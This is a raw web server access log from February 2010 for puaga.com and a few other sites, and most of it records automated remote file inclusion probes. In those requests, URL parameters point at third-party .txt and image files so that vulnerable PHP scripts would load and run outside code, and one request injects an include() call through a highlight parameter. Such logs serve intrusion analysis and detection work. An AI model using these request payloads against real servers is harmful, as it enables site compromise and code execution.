216.119.103.16 - - [11/Feb/2010:07:30:01 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.alandar.net/www2/img/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [11/Feb/2010:07:30:01 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.alandar.net/www2/img/id1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
124.217.198.155 - - [11/Feb/2010:07:30:16 -0800] "GET /logs/access_100203.log/write_comment_update.php?board_skin_path=http://www.qqe.ru/forum//attachments/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [11/Feb/2010:07:30:27 -0800] "GET /logs/access_100202.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.alandar.net/www2/img/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.160.17.201 - - [11/Feb/2010:07:30:32 -0800] "GET //bbs/delete_comment.php?board_skin_path=http://inji.es.kr//bbs///data/62/1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.160.17.201 - - [11/Feb/2010:07:30:32 -0800] "GET /logs///bbs/delete_comment.php?board_skin_path=http://inji.es.kr//bbs///data/62/1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.160.17.201 - - [11/Feb/2010:07:30:32 -0800] "GET /logs/access_100202.log%20%20///bbs/delete_comment.php?board_skin_path=http://inji.es.kr//bbs///data/62/1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.160.17.201 - - [11/Feb/2010:07:30:38 -0800] "GET /logs/access_100121.log%20%20///bbs/delete_comment.php?board_skin_path=http://inji.es.kr//bbs///data/62/1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [11/Feb/2010:07:30:41 -0800] "GET /logs/access_100202.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.alandar.net/www2/img/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [11/Feb/2010:07:30:47 -0800] "GET /logs/access_100202.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.alandar.net/www2/img/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.160.17.201 - - [11/Feb/2010:07:31:37 -0800] "GET /logs/access_100126.log%20%20///bbs/delete_comment.php?board_skin_path=http://inji.es.kr//bbs///data/62/1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
66.235.124.17 - - [11/Feb/2010:07:32:22 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" "www.pixero.net"
66.235.124.17 - - [11/Feb/2010:07:32:23 -0800] "GET / HTTP/1.1" 200 2392 "-" "Mozilla/5.0 (compatible; Ask Jeeves/Teoma; +http://about.ask.com/en/docs/about/webmasters.shtml)" "www.pixero.net"
200.93.147.154 - - [11/Feb/2010:07:34:12 -0800] "GET /appserv/main.php?appserv_root=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:07:34:12 -0800] "GET /logs//appserv/main.php?appserv_root=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:07:34:15 -0800] "GET /logs/access.log%20%20//appserv/main.php?appserv_root=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
38.101.148.126 - - [11/Feb/2010:07:34:35 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
38.101.148.126 - - [11/Feb/2010:07:34:36 -0800] "GET /orange_g/forum/viewtopic.php?p=27567 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
72.44.38.234 - - [11/Feb/2010:07:34:37 -0800] "GET /robots.txt HTTP/1.0" 200 36 "-" "taptubot *** please read http://www.taptu.com/corp/taptubot ***" "atesh.info"
72.44.38.234 - - [11/Feb/2010:07:34:39 -0800] "GET / HTTP/1.0" 200 13498 "-" "Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420+ (KHTML, like Gecko) Version/3.0 Mobile/1A543a Safari/419.3" "atesh.info"
72.44.38.234 - - [11/Feb/2010:07:34:41 -0800] "GET /atesh_info/links.js HTTP/1.0" 200 43 "http://atesh.info/" "Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420+ (KHTML, like Gecko) Version/3.0 Mobile/1A543a Safari/419.3" "atesh.info"
72.44.38.234 - - [11/Feb/2010:07:34:44 -0800] "GET /atesh_info/ai.css HTTP/1.0" 200 487 "http://atesh.info/" "Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420+ (KHTML, like Gecko) Version/3.0 Mobile/1A543a Safari/419.3" "atesh.info"
72.44.38.234 - - [11/Feb/2010:07:34:45 -0800] "GET /apple-touch-icon.png HTTP/1.0" 404 5258 "-" "Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420+ (KHTML, like Gecko) Version/3.0 Mobile/1A543a Safari/419.3" "atesh.info"
72.44.38.234 - - [11/Feb/2010:07:34:49 -0800] "GET / HTTP/1.0" 200 13498 "-" "Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420+ (KHTML, like Gecko) Version/3.0 Mobile/1A543a Safari/419.3" "www.atesh.info"
72.44.38.234 - - [11/Feb/2010:07:34:51 -0800] "GET /atesh_info/links.js HTTP/1.0" 200 43 "http://www.atesh.info/" "Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420+ (KHTML, like Gecko) Version/3.0 Mobile/1A543a Safari/419.3" "www.atesh.info"
72.44.38.234 - - [11/Feb/2010:07:34:53 -0800] "GET /atesh_info/ai.css HTTP/1.0" 200 487 "http://www.atesh.info/" "Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420+ (KHTML, like Gecko) Version/3.0 Mobile/1A543a Safari/419.3" "www.atesh.info"
58.150.99.131 - - [11/Feb/2010:07:34:56 -0800] "GET /logs/access_100115.log%20%20//errors.php?error=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:07:34:56 -0800] "GET /logs//errors.php?error=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:07:34:56 -0800] "GET /errors.php?error=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:07:34:59 -0800] "GET /logs//errors.php?error=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.38.234 - - [11/Feb/2010:07:35:02 -0800] "GET /iphone/ HTTP/1.0" 200 1805 "-" "Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420+ (KHTML, like Gecko) Version/3.0 Mobile/1A543a Safari/419.3" "www.atesh.info"
58.150.99.131 - - [11/Feb/2010:07:35:02 -0800] "GET /logs/access_100115.log%20%20//errors.php?error=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.193.216.73 - - [11/Feb/2010:07:35:04 -0800] "GET /delete_comment.php?board_skin_path=http://www.jessicakagancushman.com/images/id????? HTTP/1.0" 404 5258 "-" "libwww-perl/5.53" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:07:35:05 -0800] "GET /errors.php?error=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:07:35:19 -0800] "GET /logs/access_100125.log%20%20//errors.php?error=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:07:35:20 -0800] "GET /logs/access_100125.log%20%20//errors.php?error=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
72.44.38.234 - - [11/Feb/2010:07:35:23 -0800] "GET /mobile/ HTTP/1.0" 404 5258 "-" "Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420+ (KHTML, like Gecko) Version/3.0 Mobile/1A543a Safari/419.3" "www.atesh.info"
72.44.38.234 - - [11/Feb/2010:07:35:24 -0800] "GET /m/ HTTP/1.0" 404 5258 "-" "Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420+ (KHTML, like Gecko) Version/3.0 Mobile/1A543a Safari/419.3" "www.atesh.info"
72.44.38.234 - - [11/Feb/2010:07:35:25 -0800] "GET /mobi/ HTTP/1.0" 404 5258 "-" "Mozilla/5.0 (iPhone; U; CPU like Mac OS X; en) AppleWebKit/420+ (KHTML, like Gecko) Version/3.0 Mobile/1A543a Safari/419.3" "www.atesh.info"
72.44.38.234 - - [11/Feb/2010:07:35:26 -0800] "GET / HTTP/1.0" 200 13498 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.6; taptu-downloader) Gecko/20070725 Firefox/2.0.0.6" "atesh.info"
200.93.147.154 - - [11/Feb/2010:07:35:37 -0800] "GET /logs/access_100112.log%20%20//appserv/main.php?appserv_root=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [11/Feb/2010:07:35:42 -0800] "GET /logs/access_100202.log/http://keycarsales.com/css/templates/target.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
60.251.165.181 - - [11/Feb/2010:07:35:44 -0800] "GET /http://keycarsales.com/css/templates/target.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
60.251.165.181 - - [11/Feb/2010:07:35:47 -0800] "GET /logs/http://keycarsales.com/css/templates/target.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
62.193.216.73 - - [11/Feb/2010:07:36:20 -0800] "GET /logs/access_100126.log//delete_comment.php?board_skin_path=http://www.jessicakagancushman.com/images/id????? HTTP/1.0" 404 5258 "-" "libwww-perl/5.53" "www.puaga.com"
62.193.216.73 - - [11/Feb/2010:07:36:21 -0800] "GET /delete_comment.php?board_skin_path=http://www.jessicakagancushman.com/images/id????? HTTP/1.0" 404 5258 "-" "libwww-perl/5.53" "www.puaga.com"
62.193.216.73 - - [11/Feb/2010:07:36:21 -0800] "GET /logs//delete_comment.php?board_skin_path=http://www.jessicakagancushman.com/images/id????? HTTP/1.0" 404 5258 "-" "libwww-perl/5.53" "www.puaga.com"
91.214.45.103 - - [11/Feb/2010:07:38:46 -0800] "GET /orange_g/forum/viewtopic.php?p=29073 HTTP/1.0" 404 5258 "http://puaga.com/orange_g/forum/viewtopic.php?p=29073#29073" "Opera/9.00 (Windows NT 4.0; U; en)" "puaga.com"
91.214.45.103 - - [11/Feb/2010:07:38:47 -0800] "GET / HTTP/1.0" 200 3626 "http://puaga.com/" "Opera/9.00 (Windows NT 4.0; U; en)" "puaga.com"
200.93.147.154 - - [11/Feb/2010:07:39:09 -0800] "GET /logs/access_100117.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.solutionexchange-un.net.in/en/cache/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [11/Feb/2010:07:39:36 -0800] "GET /logs/access_100107.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.solutionexchange-un.net.in/en/cache/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.114.222.95 - - [11/Feb/2010:07:40:04 -0800] "GET /logs/access_100126.log//delete_comment.php?board_skin_path=http://www.freeporngiant.com//categories/bad.jpg??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
210.114.222.95 - - [11/Feb/2010:07:40:05 -0800] "GET /delete_comment.php?board_skin_path=http://www.freeporngiant.com//categories/bad.jpg??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
210.114.222.95 - - [11/Feb/2010:07:40:06 -0800] "GET /logs//delete_comment.php?board_skin_path=http://www.freeporngiant.com//categories/bad.jpg??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.79" "www.puaga.com"
210.116.103.118 - - [11/Feb/2010:07:40:38 -0800] "GET /logs/access_100201.log/components/com_forum/download.php?phpbb_root_path=http://www.bengalistation.com/sites/cafesports.com/tp-files/tp-modules/TPShout/Sources/tps.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.118 - - [11/Feb/2010:07:40:38 -0800] "GET /logs/components/com_forum/download.php?phpbb_root_path=http://www.bengalistation.com/sites/cafesports.com/tp-files/tp-modules/TPShout/Sources/tps.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.118 - - [11/Feb/2010:07:40:38 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://www.bengalistation.com/sites/cafesports.com/tp-files/tp-modules/TPShout/Sources/tps.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.7.90 - - [11/Feb/2010:07:40:40 -0800] "GET /logs/access_100123.log%20%20//components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.gehadnasser.com/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.7.90 - - [11/Feb/2010:07:40:40 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.gehadnasser.com/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.175.7.90 - - [11/Feb/2010:07:40:40 -0800] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.gehadnasser.com/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
60.251.165.181 - - [11/Feb/2010:07:41:06 -0800] "GET /logs/access_100131.log/http://keycarsales.com/css/templates/target.txt? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
24.23.78.174 - - [11/Feb/2010:07:41:33 -0800] "GET /main.php?sayfa=http://www.infotecknet.com.br/site/id??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.820" "www.puaga.com"
123.143.29.250 - - [11/Feb/2010:07:42:53 -0800] "GET /error.php?dir=http://teaciel.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [11/Feb/2010:07:42:53 -0800] "GET /logs/access_100116.log%20%20/error.php?dir=http://teaciel.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [11/Feb/2010:07:42:53 -0800] "GET /logs/error.php?dir=http://teaciel.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [11/Feb/2010:07:43:52 -0800] "GET /logs/access_100116.log/error.php?dir=http://teaciel.fileave.com/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
209.61.244.6 - - [11/Feb/2010:07:43:55 -0800] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
209.61.244.6 - - [11/Feb/2010:07:43:55 -0800] "GET /technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.76" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:07:44:31 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:07:44:31 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:07:44:44 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:07:44:44 -0800] "GET /logs/access_100111.log//?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:07:44:48 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
38.101.148.126 - - [11/Feb/2010:07:45:31 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
38.101.148.126 - - [11/Feb/2010:07:45:32 -0800] "GET /orange_g/forum/viewtopic.php?p=25843 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
38.101.148.126 - - [11/Feb/2010:07:45:34 -0800] "GET /orange_g/forum/viewtopic.php?p=27099 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
38.101.148.126 - - [11/Feb/2010:07:45:41 -0800] "GET /orange_g/forum/viewtopic.php?p=29614 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
216.17.109.216 - - [11/Feb/2010:07:45:45 -0800] "GET /logs//include/prodler.class.php?sPath=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [11/Feb/2010:07:45:45 -0800] "GET /include/prodler.class.php?sPath=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [11/Feb/2010:07:45:45 -0800] "GET /logs/access_100123.log%20%20//include/prodler.class.php?sPath=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [11/Feb/2010:07:45:45 -0800] "GET /logs/access_100119.log%20%20//include/prodler.class.php?sPath=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [11/Feb/2010:07:45:46 -0800] "GET /include/prodler.class.php?sPath=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [11/Feb/2010:07:45:46 -0800] "GET /logs//include/prodler.class.php?sPath=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [11/Feb/2010:07:45:46 -0800] "GET /logs/access_100123.log%20%20//include/prodler.class.php?sPath=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [11/Feb/2010:07:45:46 -0800] "GET /logs/access_100119.log%20%20//include/prodler.class.php?sPath=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [11/Feb/2010:07:45:53 -0800] "GET /logs/access_100128.log%20%20//write_update.php?board_skin_path=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [11/Feb/2010:07:45:53 -0800] "GET /write_update.php?board_skin_path=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [11/Feb/2010:07:45:53 -0800] "GET /logs//write_update.php?board_skin_path=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:07:45:55 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:07:45:55 -0800] "GET /logs/access_100111.log//?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:07:45:55 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [11/Feb/2010:07:46:03 -0800] "GET /logs/access_100123.log//include/prodler.class.php?sPath=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [11/Feb/2010:07:46:03 -0800] "GET /logs/access_100119.log//include/prodler.class.php?sPath=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [11/Feb/2010:07:46:04 -0800] "GET /logs/access_100123.log//include/prodler.class.php?sPath=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [11/Feb/2010:07:46:04 -0800] "GET /logs/access_100119.log//include/prodler.class.php?sPath=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [11/Feb/2010:07:46:06 -0800] "GET /logs/access.log%20%20//write_update.php?board_skin_path=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.204 - - [11/Feb/2010:07:46:51 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.204 - - [11/Feb/2010:07:46:58 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.204 - - [11/Feb/2010:07:46:58 -0800] "GET /logs/access_100111.log//?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [11/Feb/2010:07:47:20 -0800] "GET /write_update.php?board_skin_path=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [11/Feb/2010:07:47:20 -0800] "GET /logs/access_100128.log%20%20//write_update.php?board_skin_path=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [11/Feb/2010:07:47:20 -0800] "GET /logs//write_update.php?board_skin_path=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:07:47:24 -0800] "GET /logs/access_100116.log//?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
82.151.132.176 - - [11/Feb/2010:07:47:33 -0800] "GET /logs/access.log%20%20//write_update.php?board_skin_path=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:07:47:39 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:07:47:39 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:07:47:40 -0800] "GET /logs/access_100111.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
24.23.78.174 - - [11/Feb/2010:07:47:44 -0800] "GET /logs/access_100129.log//main.php?sayfa=http://www.infotecknet.com.br/site/id??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.820" "www.puaga.com"
24.23.78.174 - - [11/Feb/2010:07:47:45 -0800] "GET /main.php?sayfa=http://www.infotecknet.com.br/site/id??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.820" "www.puaga.com"
24.23.78.174 - - [11/Feb/2010:07:47:45 -0800] "GET /logs//main.php?sayfa=http://www.infotecknet.com.br/site/id??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.820" "www.puaga.com"
24.23.78.174 - - [11/Feb/2010:07:47:58 -0800] "GET /logs/access_100107.log//main.php?sayfa=http://www.infotecknet.com.br/site/id??? HTTP/1.1" 404 5258 "-" "libwww-perl/5.820" "www.puaga.com"
58.150.99.131 - - [11/Feb/2010:07:48:06 -0800] "GET /logs/access_100116.log//?_SERVER[DOCUMENT_ROOT]=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.0.117.1 - - [11/Feb/2010:07:48:19 -0800] "GET /logs/access_100202.log%20%20/write_comment_update.php?board_skin_path=http://www.qqe.ru/forum//attachments/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.0.117.1 - - [11/Feb/2010:07:48:19 -0800] "GET /write_comment_update.php?board_skin_path=http://www.qqe.ru/forum//attachments/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.0.117.1 - - [11/Feb/2010:07:48:19 -0800] "GET /logs/write_comment_update.php?board_skin_path=http://www.qqe.ru/forum//attachments/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.0.117.1 - - [11/Feb/2010:07:48:35 -0800] "GET /logs/access_100131.log%20%20/write_comment_update.php?board_skin_path=http://www.qqe.ru/forum//attachments/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.204 - - [11/Feb/2010:07:48:47 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.204 - - [11/Feb/2010:07:48:51 -0800] "GET /logs/access_100111.log//?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.251.189.204 - - [11/Feb/2010:07:48:51 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://musicadelibreria.net/footer?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
